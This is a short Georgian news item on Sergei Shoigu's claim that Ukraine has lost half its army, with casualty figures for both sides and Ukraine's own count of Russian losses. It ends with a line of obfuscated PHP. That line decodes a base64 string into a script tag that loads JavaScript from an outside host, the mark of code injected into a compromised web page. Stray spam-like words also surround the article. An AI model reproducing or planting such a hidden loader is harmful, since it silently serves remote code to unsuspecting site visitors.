celsiusi
ავერსი შნაიდერი
რუსეთის თავდაცვის მინისტრის, სერგეი შოიგუს მტკიცებით, უკრაინამ ომში უკვე დაკარგა არმიის ნახევარი , რუსეთმა კი 5 937 სამხედრო. 
 
მინისტრის თქმით, უკრაინის მხრიდან გარდაცვლილია 61 207 ადამიანი, დაჭრილია 49 368. 
 
აღსანიშნავია, რომ კრემლი მსხვერპლის შესახებ ინფორმაციას რეგულარულად არ აახლებს. 25 მარტს რუსეთის თავდაცვის სამინისტრომ განაცხადა, რომ 1 351 ჯარისკაცი დაიღუპა უკრაინაში შეჭრის პირველ თვეს, თუმცა შემდეგ არანაირი განახლება არ გაუკეთებია.
 
რაც შეეხება უკრაინას, ის კრემლის დანაკარგებს ყოველდღიურად აქვეყნებს, დღევანდელი მონაცემებით, რუსეთმა დაახლოებით 55 110 სამხედრო დაკარგა.
409
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");